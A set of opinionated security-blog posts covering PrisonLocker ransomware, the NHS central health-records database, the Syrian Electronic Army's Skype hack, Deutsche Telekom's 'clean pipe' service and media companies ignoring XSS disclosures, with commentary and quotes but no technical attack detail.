If you like this blog; or even if you just like the idea of this blog but dislike me – vote for it.
It’s independent. It has no external funding, no support from any company and owes allegiance to no-one. It’s just me and my cynicism.
I need your support. Vote for this blog: ‘most entertaining security blog’. But do it now, because voting closes tomorrow.
This is a bit worrying:
Guaranteeing security merely means you’re clueless and dangerous. But it’s indicative of the panic around CryptoLocker.
Panic, of course, is a universal life force – it gives living energy to any inanimate object. When you add panic to any story, it gains a life of its own; it grows legs and runs.
Panic has now been added to PrisonLocker (AKA PowerLocker), a new encrypting malware being readied for release by a guy called gyx.
But if you read the original and excellent expose published last week by Malware Must Die, you cannot help but have a few questions. For example, each new announcement says release is imminent, but each new announcement doesn’t seem to bring it any closer.
Nor does the author sound much like the traditional hacker. His command of the written language is pretty good. There are relatively few typos or howling grammatical errors and the syntax is Anglo-Saxon – he’s probably British, or at least not American. He reads like a native English speaker. He spells ‘behaviour’ with a ‘u’ (an American or someone brought up on American-English would not), he writes created by the group “Romanian Antisec”. with the fullstop outside of the quotation marks (an American would put it inside).
So with a few questions of my own, I spoke to Fraser Howard, a security researcher with Sophos. He too was a little puzzled.
“Typically,” he explained, “ransomware falls into one of two camps. The first simply locks the user out; but data and files are not normally modified or encrypted. This is easy to deal with – once the malware is removed, the user is back to normal. It’s more of an annoyance than anything else, scaring the user into paying up.
“The second encrypts the users’ files. The ‘serious’ ransomware families do this, using cryptography correctly to securely encrypt files without leaving the key anywhere accessible. PowerLocker,” he added, “claims to do both lockout and encrypt.”
This is one of the things that puzzles him: why have both? “Seems a bit daft to me – why bother locking them out if you have encrypted their data? The author claims: ‘Even if the user is able to somehow get out of locker screen, files will still be encrypted with practically unbreakable encryption.’
Well, that’s just flawed, illogical thinking.
“It makes me suspicious – it’s indecisive. When I read claims like this, it makes me wonder if the author is actually very capable.” But that’s not all. “Some of the text in the other screenshots [from the Malware Must Die report] make me suspect the author’s skills. Talk about ‘UAC bypass’ and ‘admin privileges’ – well, that’s all very basic stuff used by most malware today.”
My guess is that PrisonLocker was originally intended to be purely locking ransomware. Given the success and publicity surrounding CryptoLocker, gyx decided to add encryption. Not wishing to abandon what he’d already done, he kept the original locking mechanism. But with encryption now perceived as the primary sales incentive, the ‘prison’ epithet was no longer adequate, so he changed the name to ‘power’ locker (crypto locker already being taken).
But there’s one other thing we could consider. gyx is suggesting a purchase price of $100 for his malware. Firstly, he doesn’t seem intent on using it himself. Secondly, that’s remarkably cheap – unless, of course, it’s a ‘loss-leader’ being used to break into a new market.
And that, frankly, is what it seems like to me. A competent and well-educated coder has turned to the dark side, and is using this ‘project’ to get in. He understands software, but he doesn’t necessarily understand malware nor the malware marketplace. He’s selling it rather than planning to use it himself in order to stay one remove from the hacking, infecting and stealing side of malware – he sees himself more as an underworld manager than an underworld foot-soldier.
But saying all that, if PowerLocker is as good (or as bad) as he describes, then it is going to be a dangerous piece of malware. If it’s taken up by some of the better organised criminal groups with access to 0-day exploits, or simply experienced in the use of exploit kits like Magnitude, then PowerLocker could easily become the next PanicLocker.
Some time this month, if you live in Britain, you will receive a leaflet from the NHS. Its purpose is to persuade you that a new central database of all your health information (more or less everything your doctor knows about you, has said to you, has prescribed for you, or advised you on) held and operated by the government, is a good thing. It is not a good thing, and the leaflet does not tell you all you need to know about the database.
It is not a good thing.
Ross Anderson has provided an alternative leaflet providing more of the information that we should all be told. His leaflet provides a cut-out form that we can use to instruct our GP not to give any of our health data to the central database. We can do this. That’s the law. It’s in the Data Protection Act. If we do not do so, our health records will be uploaded automatically and we will not be able to get them removed. I suggest every Brit should read Anderson’s leaflet as well as the NHS leaflet; and I urge everyone to instruct their GP to block the upload.
Why do we need to object?
The data held will not be anonymised. It cannot be, because they want to marry our GP records with any records from hospital visits. That data will then be sold to third parties. The biggest buyers will be the pharmaceutical companies, either directly or disguised as research establishments or subcontracted to universities. By default, that data will not be anonymised.
They say we can insist on our own records being anonymised before sale. That is meaningless, irrelevant and impossible.
Raw medical records will not help in the development of new treatments or drugs. But it will help in targeting existing drugs. It will show relationships both geographically and socially between treatments and success or failure rates. It will, in short, enable the drug companies to target specific groups of patients or geographical areas with their existing drugs.
That will be the primary use of this database by the pharmaceutical companies – to locate targets and develop marketing strategies for their existing products.
Do not believe anything said to the contrary: this is what will happen.
The Syrian Electronic Army (SEA) yesterday hacked Skype’s WordPress and Twitter accounts. The likelihood is that the pro-Syrian group got hold of the password used by Skype’s media people, probably through its usual method of spear-phishing. My report on the incident for Infosecurity Magazine is here.
But this hack was a little different to SEA’s normal escapades. The group’s whole raison d’être is to deliver pro-Assad messages to counter what it believes is anti-Assad propaganda controlled and delivered by western governments. This is the reason that it has concentrated on attacking high-profile media companies.
Well, Skype is certainly high-profile — but the message is not ‘Syrian’. On both the Skype Twitter account and its WordPress blog the SEA message was this:
It’s a message you might more likely expect from Anonymous protesting against NSA surveillance and Microsoft complicity in that surveillance rather than a pro-Assad movement.
I asked SEA if it marked a change in its targets and tactics; and got this reply:
We can confirm that attack was done by us. and we gained access to important documents about monitoring accounts/emails by Microsoft.
It’s still about Syria. And we will detail that soon.
So that’s the big question now: what ties Microsoft, surveillance and Syria together?
Time to rewrite the text books. We have ‘security by threat transfer’, ‘security by threat avoidance’, ‘security by threat reduction’, and ‘security by threat acceptance’.
Now I bring you the latest evolution in the theory of security risk management: security by denial…
This, ladies and gentlemen, is why we have a problem.
Wonderful idea from Deutsche Telekom. Yesterday it said it would launch a clean pipe secure service for small companies that cannot afford their own security. For a fixed monthly fee small companies will be able to access the internet via DT’s own secure data centres. “Hackers will have no chance,” said management board member Reinhard Clemens. Well, we’ll just gloss over that, and accept it at face value.
“The ‘clean pipe’ project, in which Deutsche Telekom partners with RSA – part of U.S. technology firm EMC – is in a test phase and scheduled to hit the market early next year,” reports Reuters.
So, just a little due diligence required before I sign up…
OK, Deutsche Telekom owns T-Mobile. T-Mobile “operates the fourth and fifth largest wireless networks in the U.S. market with 45 million customers and annual revenues of $21.35 billion.” (Wikipedia). Slight problem; that means that T-Mobile is subject to FISA in the US – and the US gets DT more than $20 billion.
OK, RSA is a huge name in encryption. That’s got to be good (even though it is, well, yes, an American company). RSA got big and very rich on its invention of public key cryptography. Thing is, RSA didn’t invent it – it was invented by Ellis, Cocks and Williamson at GCHQ.
Now the details are rather obscure and still shrouded in secrecy, but there are suggestions that GCHQ told the NSA what it had discovered, and shortly after that, public key cryptography was (re)invented in the US.
I would not for one moment suggest anything underhand in the timing – but given what we now know about both the NSA and GCHQ there is a temptation to ask whether public key cryptography would have been allowed to develop if the very same mathematicians who produced it had not also discovered a way to unpick it.
Mathematicians and cryptographers tell us that cryptography based on the difficulty in factoring large nearly primes is valid.
And that’s the point. But.
Thank you NSA. Thank you GCHQ. You have reduced a wonderful and exciting internet into something dirty and distrustful. Thank you for removing any possibility of trust anywhere.
Have you ever wondered why we hear of a new hack every day? Well, here’s one reason – the arrogance and denial of some of our security managers.
A couple of months back I was speaking to Ilia Kolochenko, the CEO of a pentesting firm called High Tech Bridge. I asked him if pentesting was really necessary. Well, he said, just this morning I found flaws in [several high-profile media websites] that could, if cleverly exploited, lead to the complete owning of the networks concerned.
Needless to say I was interested. I asked him if he could find more, and laid down a few conditions to ensure that these weren’t old vulnerabilities that he already knew about. He delivered the goods, and the full story was published in Infosecurity Magazine: Infosecurity Exclusive: Major Media Organizations Still Vulnerable Despite High Profile Hacks.
Before publishing the story, all of the companies were notified and given a period of time to correct the flaws. Here’s a sample of the notifications:
Last week I have accidentally found an XSS vulnerability on your website that allows to steal visitors’ sensitive information (e.g. cookies or browsing history), perform phishing attacks and make many other nasty things… [details of the flaw and proof]
Please forward this information to your IT security team, so they can fix it. They may contact me in case they would need additional information and/or any assistance – I will be glad to help.
In some cases, where no vulnerability reporting address could be found, this or similar was sent to as many addresses as could be found.
Point one. Only one of the companies replied to the notification emails. This company basically said, thank you, fixed it. In reality it was only partly fixed and easily by-passed. So at the time of publishing the story, all of the websites had been contacted and given time to fix the flaw – but none of them had.
Point two. Shortly after publishing the story I received the following comments from one of the featured companies:
However try as I might I have found no-one at xyz inc who has ever heard of or from Mr Kolochenko, or yourselves, regarding any testing of our systems, vulnerabilities found, or in fact comments upon our security. Could you therefore please forward me [a copy of the several emails we had already sent].
Needless to say we did this, including an automated receipt email that proved that xyz inc had been sent and had received the email.
This head of xyz’s security then went on to accuse me of writing an advertorial for Kolochenko. He added,
…the vast majority of reported attacks on media broadcasters and press organisations so far in 2013 have had nothing to do with external attacks on websites or online presence, and the Syrian Electronic Army in particular have never used this attack vector – every one of their successful breaches has been the result of a phishing attack, which Mr Kolochenko’s tools will do nothing whatsoever to obviate.
This, of course, is both wrong and irrelevant – how the SEA’s preference for phishing (which could have been made easier by exploiting this vulnerability anyway) somehow protects xyz inc is beyond me.
The simple fact is this head of security was more concerned with deflecting any blame from himself, denying any vulnerability in his system and accusing me of lacking professional standards than in actually finding and fixing said vulnerability. A little humility and acceptance of help from security researchers might go a long way to making the internet a safer place.
Postscript. Following publication of the article, the websites in question fixed the flaws. As far xyz inc is concerned, Ilia subsequently received a further email:
We have now pushed out a fix for this vulnerability. Thanks very much for bring this to our attention.